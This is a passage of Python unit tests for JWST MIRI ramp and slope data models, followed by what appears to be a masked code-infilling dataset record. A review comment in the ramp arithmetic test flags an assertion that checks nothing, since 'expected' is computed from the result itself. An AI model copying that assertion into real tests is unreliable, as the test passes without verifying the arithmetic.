        self.assertIsNotNone(descr1)
        nulldp.data = np.asarray(self.ahyper)
        self.assertIsNotNone(nulldp.pixeldq)
        self.assertIsNotNone(nulldp.groupdq)
        descr2 = str(nulldp)
        self.assertIsNotNone(descr2)
        del nulldp, descr1, descr2
        # Creating an object with other than 4 dimensions must fail.
        a1d = [10,20,30,40]
        c1d = [1,0,0,0]
        self.assertRaises(ValueError, MiriRampModel, data=a1d, pixeldq=c1d)
        a2d = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]
        c2d = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]
        self.assertRaises(ValueError, MiriRampModel, data=a2d, groupdq=c2d)
        a3d = [a2d, a2d, a2d]
        c3d = [c2d, c2d, c2d]
        self.assertRaises(ValueError, MiriRampModel, data=a3d, pixeldq=c3d)
        self.assertRaises(ValueError, MiriRampModel, data=a3d, groupdq=c3d)
        # The pixeldq array must be 2-D.
        self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,
                          pixeldq=self.ccube)
        # The groupdq array must be 4-D.
        self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,
                          groupdq=self.c1)
    def test_masking(self):
        """The dq attribute must reflect the chosen 'maskwith' source."""
        # Ramp data must have a dq array which gives a view of one
        # or both of the pixeldq and groupdq masks
        self.assertIsNotNone(self.dataproduct.dq)
        # Create a data product masked by the pixeldq array.
        # The dq and pixeldq arrays must be the same
        mask1 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,
                              groupdq=self.chyper, maskwith='pixeldq')
        self.assertIsNotNone(mask1.pixeldq)
        self.assertGreater(len(mask1.pixeldq), 0)
        self.assertIsNotNone(mask1.dq)
        self.assertGreater(len(mask1.dq), 0)
        self.assertEqual(mask1.dq.shape, mask1.pixeldq.shape)
        self.assertTrue(np.all( mask1.dq == mask1.pixeldq ))
        del mask1
        # Create a data product masked by the groupdq array.
        # The dq and groupdq arrays must be the same
        mask2 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,
                              groupdq=self.chyper, maskwith='groupdq')
        self.assertIsNotNone(mask2.groupdq)
        self.assertGreater(len(mask2.groupdq), 0)
        self.assertIsNotNone(mask2.dq)
        self.assertGreater(len(mask2.dq), 0)
        self.assertEqual(mask2.dq.shape, mask2.groupdq.shape)
        self.assertTrue(np.all( mask2.dq == mask2.groupdq ))
        del mask2
        # Create a data product masked by both pixeldq and groupdq arrays.
        # The result must have the same shape as the groupdq array but be
        # a combination of both masks.
        mask3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1,
                              groupdq=self.chyper, maskwith='both')
        self.assertIsNotNone(mask3.pixeldq)
        self.assertGreater(len(mask3.pixeldq), 0)
        self.assertIsNotNone(mask3.groupdq)
        self.assertGreater(len(mask3.groupdq), 0)
        self.assertIsNotNone(mask3.dq)
        self.assertGreater(len(mask3.dq), 0)
        self.assertEqual(mask3.dq.shape, mask3.groupdq.shape)
        # 'both' means a bitwise OR of the two masks.
        expected = mask3.groupdq | mask3.pixeldq
        self.assertTrue(np.all( mask3.dq == expected ))
        del mask3
    def test_arithmetic(self):
        """Ramp-model-specific arithmetic: scalar and product combination."""
        # The ramp data model supports all the arithmetic operations
        # supported by the MiriMeasuredModel. The following are exceptions
        # specific to the ramp model.
        # Create a data model in which the DATA and DQ arrays have different
        # shapes.
        testdp = MiriRampModel(data=self.ahyper, pixeldq=self.c1,
                               groupdq=self.chyper, maskwith='both')
        descr = str(testdp)
        self.assertIsNotNone(descr)
        del descr
        # Suppress warning about the DQ array being propagated only from GROUPDQ
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            # Check the product can be combined with itself
            double = testdp * 2.0
            self.assertIsNotNone(double.data)
            self.assertGreater(len(double.data), 0)
            # NOTE(review): 'expected' is derived from double.data itself,
            # so (double.data - expected) equals -double.data and this
            # assertion is effectively vacuous for positive data. The
            # intent was presumably expected = testdp.data * 2.0 with an
            # abs() comparison — confirm before changing.
            expected = double.data * 2.0
            self.assertTrue(np.all( (double.data - expected) < 0.001 ))
            descr = str(double)
            self.assertIsNotNone(descr)
            del descr
            # When this is combined with another data product, the DATA
            # array is masked with both the pixeldq and groupdq arrays.
            warnings.simplefilter("ignore")
            result = self.dataproduct + testdp
            self.assertIsNotNone(result.data)
            self.assertGreater(len(result.data), 0)
            self.assertIsNotNone(result.dq)
            self.assertGreater(len(result.dq), 0)
            descr = str(result)
            self.assertIsNotNone(descr)
            del descr
    def test_fitsio(self):
        """Round-trip the ramp product through a FITS file unchanged."""
        # Suppress metadata warnings
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            # Check that the data product can be written to a FITS
            # file and read back again without changing the data.
            self.dataproduct.save(self.testfile, overwrite=True)
            with MiriRampModel(self.testfile) as readback:
                assert_products_equal( self, self.dataproduct, readback,
                                       arrays=['data', 'refout', 'pixeldq','groupdq'],
                                       tables=['pixeldq_def', 'groupdq_def'] )
            del readback
    def test_description(self):
        """str, repr and stats must run and return non-null strings."""
        # Test that the querying and description functions work.
        # For the test to pass these need to run without error
        # and generate non-null strings.
        descr = str(self.dataproduct)
        self.assertIsNotNone(descr)
        del descr
        descr = repr(self.dataproduct)
        self.assertIsNotNone(descr)
        del descr
        descr = self.dataproduct.stats()
        self.assertIsNotNone(descr)
        del descr
        # Attempt to access the SCI, REFOUT and DQ arrays through attributes.
        descr = str(self.dataproduct.data)
        self.assertIsNotNone(descr)
        del descr
        descr = str(self.dataproduct.refout)
        self.assertIsNotNone(descr)
        del descr
        descr = str(self.dataproduct.dq)
        self.assertIsNotNone(descr)
        del descr
class TestMiriSlopeModel(unittest.TestCase):
    """Unit tests for MiriSlopeModel (3-D slope data with zeropt/fiterr)."""
    # Most of the necessary tests are already carried out by
    # the TestMiriMeasuredModel class.
    def setUp(self):
        """Build a 3x3x4 slope product with example metadata."""
        # Create a slope data product.
        a1 = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]
        b1 = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]
        c1 = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]
        acube = [a1,a1,a1]
        bcube = [b1,b1,b1]
        ccube = [c1,c1,c1]
        dcube = [a1,b1,a1]
        self.dataproduct = MiriSlopeModel(data=acube, err=bcube,
                                          dq=ccube, dq_def=master_flags,
                                          zeropt=dcube, fiterr=dcube)
        # Add some example metadata.
        self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',
                                                   'V1.0')
        self.dataproduct.set_observation_metadata()
        self.dataproduct.set_target_metadata(0.0, 0.0)
        self.dataproduct.set_instrument_metadata(detector='MIRIMAGE',
                                                 filt='F2550W',
                                                 ccc_pos='OPEN',
                                                 deck_temperature=11.0,
                                                 detector_temperature=6.0)
        self.dataproduct.set_exposure_metadata(readpatt='SLOW',
                                               nints=3, ngroups=10,
                                               frame_time=1.0,
                                               integration_time=100.0,
                                               group_time=1000.0,
                                               reset_time=0, frame_resets=3)
        self.testfile = "MiriSlopeModel_test.fits"
    def tearDown(self):
        """Release the data product and remove the temporary FITS file."""
        # Tidy up
        del self.dataproduct
        # Remove temporary file, if able to.
        if os.path.isfile(self.testfile):
            try:
                os.remove(self.testfile)
            except Exception as e:
                # Best-effort cleanup: warn rather than fail the test run.
                strg = "Could not remove temporary file, " + self.testfile + \
                    "\n " + str(e)
                warnings.warn(strg)
    def test_creation(self):
        """Construction with other than 3-D arrays must raise ValueError."""
        # Creating an object with other than 3 dimensions must fail.
        a1d = [10,20,30,40]
        b1d = [1,2,3,4]
        c1d = [1,0,0,0]
        self.assertRaises(ValueError, MiriSlopeModel, data=a1d, err=b1d,
                          dq=c1d)
        a2d = [a1d, a1d, a1d]
        b2d = [b1d, b1d, b1d]
        c2d = [c1d, c1d, c1d]
        self.assertRaises(ValueError, MiriSlopeModel, data=a2d, err=b2d,
                          dq=c2d)
        # 3-D (a3d etc.) is the valid case; it is only built here as a
        # stepping stone to the invalid 4-D arrays below.
        a3d = [a2d, a2d]
        b3d = [b2d, b2d]
        c3d = [c2d, c2d]
        a4d = [a3d, a3d]
        b4d = [b3d, b3d]
        c4d = [c3d, c3d]
        self.assertRaises(ValueError, MiriSlopeModel, data=a4d, err=b4d,
                          dq=c4d)
    def test_copy(self):
        """A copy of the product must compare equal array-by-array."""
        # Test that a copy can be made of the data product.
        datacopy = self.dataproduct.copy()
        self.assertIsNotNone(datacopy)
        assert_products_equal( self, self.dataproduct, datacopy,
                               arrays=['data', 'err', 'dq',
                                       'nreads', 'readsat', 'ngoodseg',
                                       'zeropt', 'fiterr'],
                               tables='dq_def' )
        del datacopy
    def test_fitsio(self):
        """Round-trip the slope product through a FITS file unchanged."""
        # Suppress metadata warnings
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            # Check that the data product can be written to a FITS
            # file and read back again without changing the data.
            self.dataproduct.save(self.testfile, overwrite=True)
            with MiriSlopeModel(self.testfile) as readback:
                assert_products_equal( self, self.dataproduct, readback,
                                       arrays=['data', 'err', 'dq',
                                               'nreads', 'readsat', 'ngoodseg',
                                               'zeropt', 'fiterr'],
                                       tables='dq_def' )
            del readback
    def test_description(self):
        """str, repr and stats must run without error."""
        # Test that the querying and description functions work.
        # For this test to pass these only need to run without error.
        descr = str(self.dataproduct)
        self.assertIsNotNone(descr)
        del descr
        descr = repr(self.dataproduct)
        self.assertIsNotNone(descr)
        del descr
        descr = self.dataproduct.stats()
        self.assertIsNotNone(descr)
        del descr
        # Attempt to access the SCI and DQ arrays through attributes.
        descr = str(self.dataproduct.data)
        self.assertIsNotNone(descr)
        del descr
        descr = str(self.dataproduct.dq)
        self.assertIsNotNone(descr)
        del descr
# When this module is executed as a main program, run the unit tests.
if __name__ == '__main__':
    unittest.main()
|
normal
|
{
"blob_id": "644b4a2f0e8ce95e669c9c01df111c943e0c4af2",
"index": 3417,
"step-1": "<mask token>\n\n\nclass TestMiriMeasuredModel(unittest.TestCase):\n <mask token>\n <mask token>\n\n def test_creation(self):\n dq_def_names = list(MiriMeasuredModel.dq_def_names)\n schema_names = list(self.dataproduct.get_field_names('dq_def'))\n self.assertEqual(dq_def_names, schema_names,\n \"'dq_def_names' class variable does not match schema\")\n a2 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n newdp1 = MiriMeasuredModel(data=a2)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.err)\n self.assertEqual(newdp1.err.shape, newdp1.data.shape)\n self.assertAlmostEqual(np.mean(newdp1.err), 0.0)\n self.assertIsNotNone(newdp1.dq)\n self.assertEqual(newdp1.dq.shape, newdp1.dq.shape)\n self.assertEqual(np.mean(newdp1.dq), 0)\n descr1 = str(newdp1)\n self.assertIsNotNone(descr1)\n del newdp1, descr1\n newdp2 = MiriMeasuredModel(data=a2, err=b2)\n self.assertIsNotNone(newdp2.data)\n self.assertGreater(len(newdp2.data), 0)\n self.assertIsNotNone(newdp2.err)\n self.assertEqual(newdp2.err.shape, newdp2.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp2.err), 0.0)\n self.assertIsNotNone(newdp2.dq)\n self.assertEqual(newdp2.dq.shape, newdp2.dq.shape)\n self.assertEqual(np.mean(newdp2.dq), 0)\n descr2 = str(newdp2)\n self.assertIsNotNone(descr2)\n del newdp2, descr2\n newdp3 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.err)\n self.assertEqual(newdp3.err.shape, newdp3.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp3.err), 0.0)\n self.assertIsNotNone(newdp3.dq)\n self.assertEqual(newdp3.dq.shape, newdp3.dq.shape)\n self.assertNotEqual(np.mean(newdp3.dq), 0)\n descr3 = str(newdp3)\n self.assertIsNotNone(descr3)\n del newdp3, descr3\n emptydp = MiriMeasuredModel((4, 4))\n 
self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (4, 4))\n self.assertIsNotNone(emptydp.err)\n self.assertEqual(emptydp.err.shape, (4, 4))\n self.assertIsNotNone(emptydp.dq)\n self.assertEqual(emptydp.dq.shape, (4, 4))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriMeasuredModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(a2)\n self.assertIsNotNone(nulldp.err)\n self.assertIsNotNone(nulldp.dq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n scalardp = MiriMeasuredModel(data=42)\n self.assertEqual(scalardp.data, 42)\n self.assertIsNotNone(scalardp.err)\n self.assertIsNotNone(scalardp.dq)\n descr = str(scalardp)\n self.assertIsNotNone(descr)\n del scalardp, descr\n self.assertRaises(ValueError, MiriMeasuredModel, init=[])\n self.assertRaises(ValueError, MiriMeasuredModel, init=42)\n self.assertRaises(ValueError, MiriMeasuredModel, init='not a file name'\n )\n self.assertRaises(IOError, MiriMeasuredModel, init='nosuchfile.fits')\n self.assertRaises(ValueError, MiriMeasuredModel, data='badstring')\n\n def test_metadata(self):\n kwstrg = self.simpleproduct.find_fits_keyword('TELESCOP',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n telname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.meta.telescope\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.get_fits_keyword('TELESCOP')\n self.assertEqual(telname, 'JWST')\n kwstrg = self.simpleproduct.find_fits_keyword('INSTRUME',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n insname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.meta.instrument.name\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.get_fits_keyword('INSTRUME')\n self.assertEqual(insname, 'MIRI')\n self.simpleproduct.add_history('History 1')\n 
self.simpleproduct.add_history('History 2')\n self.simpleproduct.add_history('History 3')\n self.assertGreaterEqual(len(self.simpleproduct.get_history()), 3)\n strg = self.simpleproduct.get_history_str()\n self.assertIsNotNone(strg)\n self.assertGreater(len(strg), 0)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_arithmetic(self):\n a2 = [[90, 80, 70, 60], [50, 40, 30, 20], [10, 0, -10, -20]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[0, 1, 1, 0], [0, 2, 0, 2], [1, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n newsimple = self.simpleproduct - self.simpleproduct\n self.assertAlmostEqual(newsimple.data.all(), 0.0)\n del newsimple\n result = self.dataproduct + 42\n test1 = self.dataproduct.data + 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct + newdp\n test1 = self.dataproduct.data + newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct - 42\n test1 = self.dataproduct.data - 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct - newdp\n test1 = self.dataproduct.data - newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, 
actualsq)\n del result\n result = self.dataproduct + newdp - newdp\n test1 = self.dataproduct.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * 3\n test1 = self.dataproduct.data * 3\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * newdp\n test1 = self.dataproduct.data * newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n err1 = self.dataproduct.err\n da1 = self.dataproduct.data\n err2 = newdp.err\n da2 = newdp.data\n expectedErr = np.sqrt(err1 * err1 * da2 * da2 + err2 * err2 * da1 * da1\n )\n self.assertTrue(np.array_equal(expectedErr, result.err))\n del result, da1, da2, err1, err2, expectedErr\n result = self.dataproduct / 3.0\n test1 = self.dataproduct.data / 3.0\n test2 = result.data\n self.assertAlmostEqual(test1.all(), test2.all())\n del test1, test2, result\n self.assertRaises(ValueError, self.dataproduct.__truediv__, 0.0)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n result = self.dataproduct / newdp\n test1 = self.dataproduct.data / newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n dat = self.dataproduct.data[1][1]\n newdat = newdp.data[1][1]\n resultErr = result.err[1][1]\n dpErr = self.dataproduct.err[1][1]\n newdpErr = newdp.err[1][1]\n expectErr = np.sqrt(dpErr * dpErr / (newdat * newdat) + \n newdpErr * newdpErr * dat * dat / (newdat * newdat * newdat *\n newdat))\n self.assertEqual(expectErr, resultErr)\n del test1, test2, result\n newdp2 = newdp * 2\n newdp3 = newdp * 3\n newdp4 = newdp2 + newdp3\n result = (self.dataproduct - newdp) * newdp2 / newdp3 + newdp4\n del newdp, newdp2, newdp3, newdp4\n del result\n <mask token>\n <mask token>\n\n\nclass TestMiriRampModel(unittest.TestCase):\n\n def setUp(self):\n self.a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n self.c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.c2 = 
[[0, 1, 1, 0], [1, 0, 0, 1], [1, 0, 1, 0]]\n self.acube = [self.a1, self.a1, self.a1]\n self.ccube = [self.c1, self.c2, self.c1]\n self.ahyper = [self.acube, self.acube]\n self.chyper = [self.ccube, self.ccube]\n self.refout = np.ones_like(self.chyper)\n self.dataproduct = MiriRampModel(data=self.ahyper, refout=self.\n refout, pixeldq=self.c1, dq_def=pixeldq_flags, groupdq=self.\n chyper, groupdq_def=groupdq_flags)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIFULONG',\n channel='1', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST', nints=1,\n ngroups=1, frame_time=1.0, integration_time=10.0, group_time=\n 10.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriRampModel_test.fits'\n\n def tearDown(self):\n del self.a1, self.c1, self.c2\n del self.acube, self.ccube\n del self.ahyper, self.chyper\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n bcube = [b1, b1, b1]\n bhyper = [bcube, bcube]\n newdp1 = MiriRampModel(data=self.ahyper)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.pixeldq)\n self.assertTrue(newdp1.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp1.groupdq)\n self.assertTrue(newdp1.groupdq.ndim == 4)\n self.assertEqual(np.mean(newdp1.groupdq), 0)\n descr1 = str(newdp1)\n del newdp1, descr1\n newdp3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n 
self.assertIsNotNone(newdp3.pixeldq)\n self.assertTrue(newdp3.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp3.pixeldq), 0)\n self.assertIsNotNone(newdp3.groupdq)\n self.assertTrue(newdp3.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp3.groupdq), 0)\n descr3 = str(newdp3)\n del newdp3, descr3\n newdp4 = MiriRampModel(data=self.ahyper, pixeldq=self.c1)\n self.assertIsNotNone(newdp4.data)\n self.assertGreater(len(newdp4.data), 0)\n self.assertIsNotNone(newdp4.pixeldq)\n self.assertTrue(newdp4.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp4.pixeldq), 0)\n self.assertIsNotNone(newdp4.groupdq)\n self.assertTrue(newdp4.groupdq.ndim == 4)\n descr4 = str(newdp4)\n del newdp4, descr4\n newdp5 = MiriRampModel(data=self.ahyper, groupdq=self.chyper)\n self.assertIsNotNone(newdp5.data)\n self.assertGreater(len(newdp5.data), 0)\n self.assertIsNotNone(newdp5.pixeldq)\n self.assertTrue(newdp5.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp5.groupdq)\n self.assertTrue(newdp5.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp5.groupdq), 0)\n descr5 = str(newdp5)\n del newdp5, descr5\n emptydp = MiriRampModel((2, 2, 2, 2))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (2, 2, 2, 2))\n self.assertIsNotNone(emptydp.pixeldq)\n self.assertIsNotNone(emptydp.groupdq)\n self.assertEqual(emptydp.groupdq.shape, (2, 2, 2, 2))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriRampModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(self.ahyper)\n self.assertIsNotNone(nulldp.pixeldq)\n self.assertIsNotNone(nulldp.groupdq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n a1d = [10, 20, 30, 40]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriRampModel, data=a1d, pixeldq=c1d)\n a2d = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n c2d = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.assertRaises(ValueError, 
MiriRampModel, data=a2d, groupdq=c2d)\n a3d = [a2d, a2d, a2d]\n c3d = [c2d, c2d, c2d]\n self.assertRaises(ValueError, MiriRampModel, data=a3d, pixeldq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=a3d, groupdq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n pixeldq=self.ccube)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n groupdq=self.c1)\n\n def test_masking(self):\n self.assertIsNotNone(self.dataproduct.dq)\n mask1 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='pixeldq')\n self.assertIsNotNone(mask1.pixeldq)\n self.assertGreater(len(mask1.pixeldq), 0)\n self.assertIsNotNone(mask1.dq)\n self.assertGreater(len(mask1.dq), 0)\n self.assertEqual(mask1.dq.shape, mask1.pixeldq.shape)\n self.assertTrue(np.all(mask1.dq == mask1.pixeldq))\n del mask1\n mask2 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='groupdq')\n self.assertIsNotNone(mask2.groupdq)\n self.assertGreater(len(mask2.groupdq), 0)\n self.assertIsNotNone(mask2.dq)\n self.assertGreater(len(mask2.dq), 0)\n self.assertEqual(mask2.dq.shape, mask2.groupdq.shape)\n self.assertTrue(np.all(mask2.dq == mask2.groupdq))\n del mask2\n mask3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n self.assertIsNotNone(mask3.pixeldq)\n self.assertGreater(len(mask3.pixeldq), 0)\n self.assertIsNotNone(mask3.groupdq)\n self.assertGreater(len(mask3.groupdq), 0)\n self.assertIsNotNone(mask3.dq)\n self.assertGreater(len(mask3.dq), 0)\n self.assertEqual(mask3.dq.shape, mask3.groupdq.shape)\n expected = mask3.groupdq | mask3.pixeldq\n self.assertTrue(np.all(mask3.dq == expected))\n del mask3\n\n def test_arithmetic(self):\n testdp = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n descr = str(testdp)\n self.assertIsNotNone(descr)\n del descr\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n double = 
testdp * 2.0\n self.assertIsNotNone(double.data)\n self.assertGreater(len(double.data), 0)\n expected = double.data * 2.0\n self.assertTrue(np.all(double.data - expected < 0.001))\n descr = str(double)\n self.assertIsNotNone(descr)\n del descr\n warnings.simplefilter('ignore')\n result = self.dataproduct + testdp\n self.assertIsNotNone(result.data)\n self.assertGreater(len(result.data), 0)\n self.assertIsNotNone(result.dq)\n self.assertGreater(len(result.dq), 0)\n descr = str(result)\n self.assertIsNotNone(descr)\n del descr\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriRampModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'refout', 'pixeldq', 'groupdq'], tables\n =['pixeldq_def', 'groupdq_def'])\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.refout)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriSlopeModel(unittest.TestCase):\n\n def setUp(self):\n a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n acube = [a1, a1, a1]\n bcube = [b1, b1, b1]\n ccube = [c1, c1, c1]\n dcube = [a1, b1, a1]\n self.dataproduct = MiriSlopeModel(data=acube, err=bcube, dq=ccube,\n dq_def=master_flags, zeropt=dcube, fiterr=dcube)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n 
self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIMAGE', filt=\n 'F2550W', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='SLOW', nints=3,\n ngroups=10, frame_time=1.0, integration_time=100.0, group_time=\n 1000.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriSlopeModel_test.fits'\n\n def tearDown(self):\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n a1d = [10, 20, 30, 40]\n b1d = [1, 2, 3, 4]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriSlopeModel, data=a1d, err=b1d, dq=c1d\n )\n a2d = [a1d, a1d, a1d]\n b2d = [b1d, b1d, b1d]\n c2d = [c1d, c1d, c1d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a2d, err=b2d, dq=c2d\n )\n a3d = [a2d, a2d]\n b3d = [b2d, b2d]\n c3d = [c2d, c2d]\n a4d = [a3d, a3d]\n b4d = [b3d, b3d]\n c4d = [c3d, c3d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a4d, err=b4d, dq=c4d\n )\n\n def test_copy(self):\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal(self, self.dataproduct, datacopy, arrays=[\n 'data', 'err', 'dq', 'nreads', 'readsat', 'ngoodseg', 'zeropt',\n 'fiterr'], tables='dq_def')\n del datacopy\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriSlopeModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq', 'nreads', 'readsat',\n 'ngoodseg', 'zeropt', 'fiterr'], tables='dq_def')\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n 
del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\n<mask token>\n",
